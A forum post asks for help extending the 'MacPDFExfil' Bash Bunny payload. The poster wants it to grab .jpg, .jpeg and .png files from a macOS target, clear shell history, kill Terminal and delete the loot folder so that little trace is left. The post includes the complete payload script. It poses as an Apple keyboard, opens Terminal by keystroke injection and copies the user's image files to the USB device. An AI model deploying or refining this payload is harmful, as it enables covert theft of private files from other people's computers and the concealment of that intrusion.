MacPDFExfil modification

[me2019]

Hello,

I posted this same question under the Applications&Coding section but thought it would probably fit better here and it doesn't seem like I can delete the old post.

So anyway...here is my question:

I was playing around with the MacPDFExfil payload on my Bash Bunny and as expected it worked fine. I however tried to modify it a bit and ran into some trouble.

I wanted the BashBunny to look for .jpg, . jpeg and .png files all at the same time and put them into the loot folder. Changing it to only one of them is no problem but I couldn't figure out a way to look for all 3 file types at the same time. Moreover, I wanted the code to have an history -c and then the killall Terminal to leave as little trace of what I did as possible. Obviously that didn't work either. Replacing the killall Terminal with history -c works fine but having history -c and then killall Terminal didn't work. I played around with it and either I got an error or the last part (killall Terminal) just didn't show up at all. Last but not least I would also like to remove the /loot folder that is created on the target machine itself.

If someone could help me with that I'd appreciate it a lot.

Thanks 

  Quote

#!/bin/bash
#
# Title:         MacPDFExfil
# Author:        k1ul3ss
# Props:         audibleblink
# Version:       1.0
# Category:      Exfiltration
# Target:        macOS
# Attackmodes:   HID, Storage

ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

# device name
dev_name="BashBunny"

# loot directory
lootdir="/Volumes/$dev_name/loot/Images/"

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir -p $lootdir
QUACK ENTER
QUACK STRING find \~ -name \'*.png\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
QUACK ENTER

# sync the filesystem
sync